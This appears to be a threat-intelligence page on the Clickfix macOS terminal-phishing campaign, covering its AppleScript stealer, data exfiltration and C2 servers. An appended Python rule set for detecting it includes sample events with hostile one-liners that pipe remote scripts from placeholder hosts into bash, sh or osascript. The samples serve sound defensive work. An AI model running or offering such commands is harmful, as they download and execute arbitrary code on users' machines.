
Clickfix on macOS: AppleScript Stealer, Terminal Phishing, and C2 Infrastructure

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

A sophisticated phishing campaign targeting macOS users employs a technique called Clickfix, which tricks victims into running terminal commands that execute malicious AppleScript. This script steals sensitive data including browser profiles, crypto wallets, and personal files. The attackers use fake security prompts and CAPTCHA pages on domains like cryptoinfo-news.com to appear legitimate. The stolen data is exfiltrated to command and control servers, some of which run on unusual ports. The campaign's infrastructure spans multiple regions, with several C2 servers hosted in Russia. The analysis uncovered over 50 related servers with similar configurations, suggesting a financially motivated and globally distributed operation.

OPENCTI LABELS :

phishing,macos,data theft,clickfix,c2 infrastructure,applescript,cryptowallet,terminal commands


AI COMMENTARY :

1. macOS users are the target of a phishing campaign known as Clickfix. The operation tricks victims into executing terminal commands under the pretense of legitimate security prompts and CAPTCHA checks served from domains such as cryptoinfo-news.com. The professional look of the lure pages, combined with the widespread assumption that macOS is a low-risk target, has let the attackers harvest high-value data with little scrutiny.

2. At the heart of the Clickfix campaign lies a combination of social engineering and script execution. Victims are shown fake security prompts or CAPTCHA pages claiming that a check must be completed or a problem fixed, and are instructed to copy a command and paste it into Terminal. Once the command runs, it fetches and executes a malicious AppleScript. No vulnerability is exploited: because the victim runs the command in their own Terminal session, the payload executes with that user's permissions, and because no application bundle is downloaded, Gatekeeper's checks on downloaded apps never enter the picture. This is what makes terminal phishing effective against otherwise well-maintained machines.

3. The malicious AppleScript component, dubbed the AppleScript Stealer, scours the victim's device for valuable information. It collects browser profiles, session cookies, saved credentials, crypto wallet files and personal files. Running as the logged-in user, it can read anything that user can, including the browser profile and wallet directories under the home folder, and AppleScript's automation facilities let it drive the rest of the collection through shell commands. Nothing visible happens in the foreground, so the activity raises little suspicion and the campaign can run undetected for extended periods.

4. Once the data is harvested, it is packaged and exfiltrated to the attackers' command and control servers. The range of stolen data poses significant risks, from account takeovers and identity theft to direct financial losses through drained crypto assets. Stolen session cookies in particular allow an attacker to reuse a logged-in session without the password or a second factor. The inclusion of personal files in the exfiltration further amplifies the campaign's potential for extortion and blackmail. Victims may not realize the full extent of the breach until sensitive information appears on illicit marketplaces or unauthorized transactions hit their accounts.

5. The infrastructure supporting Clickfix is global, featuring more than 50 known servers with consistent configurations. Several command and control nodes reside in Russia and operate on nonstandard ports, which defeats detection rules that only inspect conventional web ports. The distributed, redundant layout suggests a financially motivated operation that invests in keeping its servers available. Researchers have identified multiple ancillary domains and hosting providers, pointing to a well-resourced operation rather than a one-off campaign.

6. Defending against Clickfix requires a layered approach. Organizations and individual users should treat any web page or message that asks them to paste a command into Terminal as hostile, and IT teams should verify any unsolicited instructions before anyone runs them. Browser and system updates still matter, but they do not stop this campaign on their own, because it relies on the user executing the payload rather than on a vulnerability. Multi-factor authentication should protect high-value accounts and wallets, bearing in mind that stolen session cookies can bypass it, so sessions should be revoked after a suspected compromise. Endpoint detection that flags osascript launched from Terminal, shells that pipe remote content into an interpreter, and outbound connections from script interpreters to nonstandard ports can provide early warning. Above all, user awareness of terminal phishing and the dangers of social engineering remains a critical step in thwarting campaigns like Clickfix.
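The following is an added example, not code from the original report or from the researchers behind it. It implements the detection logic sketched in points 2 and 6 as a small rule set run over constructed endpoint events: process executions with their parent and command line, and network connections with their destination port. The field names, hostnames, IP addresses, ports and command lines are assumptions made for illustration; the `.invalid` domains and the 203.0.113.0/24 address are reserved documentation values and do not refer to the campaign's real infrastructure.

```python
"""Detection rules for Clickfix-style terminal phishing on macOS.

Added example, not part of the original report. It scores constructed
process-execution and network-connection events of the kind an EDR
sensor or the macOS unified log would emit. Field names, hostnames,
IPs, ports and command lines below are assumptions for illustration.
"""
from __future__ import annotations

import re

INTERPRETERS = {"osascript", "bash", "sh", "zsh", "python3", "perl"}
FETCHERS = {"curl", "wget"}
SCRIPT_PROCS = INTERPRETERS | FETCHERS
COMMON_PORTS = {80, 443, 8080, 8443}

_WORD = re.compile(r"[A-Za-z0-9_./-]+")


def basenames(cmdline: str) -> set[str]:
    """Every word-like token in a command line reduced to its basename,
    so /usr/bin/curl and curl compare equal."""
    return {tok.rsplit("/", 1)[-1] for tok in _WORD.findall(cmdline)}


def rules_for(ev: dict) -> list[str]:
    """Return the names of every rule the event trips (empty = clean)."""
    hits: list[str] = []
    if ev.get("type") == "process":
        cmd = ev.get("cmdline", "")
        names = basenames(cmd)
        from_terminal = ev.get("parent") == "Terminal"
        # R1: the paste-into-Terminal pattern. Content fetched over the
        # network is handed straight to an interpreter via a pipe,
        # command substitution or backticks.
        if (from_terminal and names & FETCHERS and names & INTERPRETERS
                and any(s in cmd for s in ("|", "$(", "`"))):
            hits.append("R1_remote_script_piped_to_interpreter")
        # R2: inline AppleScript that shells out. osascript -e with
        # 'do shell script' is how a one-liner reaches the rest of the OS.
        if "osascript" in names and "-e" in names and "do shell script" in cmd:
            hits.append("R2_inline_applescript_shell_out")
        # R3: an obfuscated payload decoded on the fly and fed to an
        # interpreter (macOS base64 decodes with -D, GNU with -d/--decode).
        if ("base64" in names and names & {"-d", "-D", "--decode"}
                and names & INTERPRETERS):
            hits.append("R3_base64_decoded_into_interpreter")
    elif ev.get("type") == "network":
        # R4: a script interpreter or fetcher talking to a port that is not
        # a normal web port, matching the nonstandard C2 ports reported.
        if (ev.get("process") in SCRIPT_PROCS
                and ev.get("port") not in COMMON_PORTS):
            hits.append("R4_script_process_to_nonstandard_port")
    return hits


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map event id -> tripped rules, dropping clean events."""
    return {ev["id"]: h for ev in events if (h := rules_for(ev))}


# Constructed sample telemetry (hypothetical hosts, ports and commands).
SAMPLE_EVENTS = [
    # e1: benign download in Terminal, nothing executes the result
    {"id": "e1", "type": "process", "parent": "Terminal", "process": "curl",
     "cmdline": "curl -O https://example.invalid/tool.tar.gz"},
    # e2: remote script piped straight into a shell
    {"id": "e2", "type": "process", "parent": "Terminal", "process": "bash",
     "cmdline": 'bash -c "curl -fsSL http://lure.invalid/fix.sh | bash"'},
    # e3: inline AppleScript that fetches and runs a second stage
    {"id": "e3", "type": "process", "parent": "Terminal", "process": "osascript",
     "cmdline": "osascript -e 'do shell script \"curl -s http://lure.invalid/p | sh\"'"},
    # e4: base64 blob decoded and executed
    {"id": "e4", "type": "process", "parent": "Terminal", "process": "sh",
     "cmdline": "echo aGVsbG8= | base64 -D | sh"},
    # e5: osascript calling out to a nonstandard port
    {"id": "e5", "type": "network", "process": "osascript",
     "dest": "203.0.113.5", "port": 4444},
    # e6: ordinary browser traffic
    {"id": "e6", "type": "network", "process": "Safari",
     "dest": "203.0.113.9", "port": 443},
]

if __name__ == "__main__":
    for eid, hits in triage(SAMPLE_EVENTS).items():
        print(eid, ", ".join(hits))
```

R1 is the rule that carries most of the weight: legitimate developer tooling does pipe `curl` into `sh`, so in production it should be paired with the parent-process check shown here and an allowlist of known installer hosts rather than fired on its own. R4 depends on the sensor reporting the originating process for each connection; without that attribution it degrades into a plain port-based rule that the campaign's use of nonstandard ports was presumably chosen to evade.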

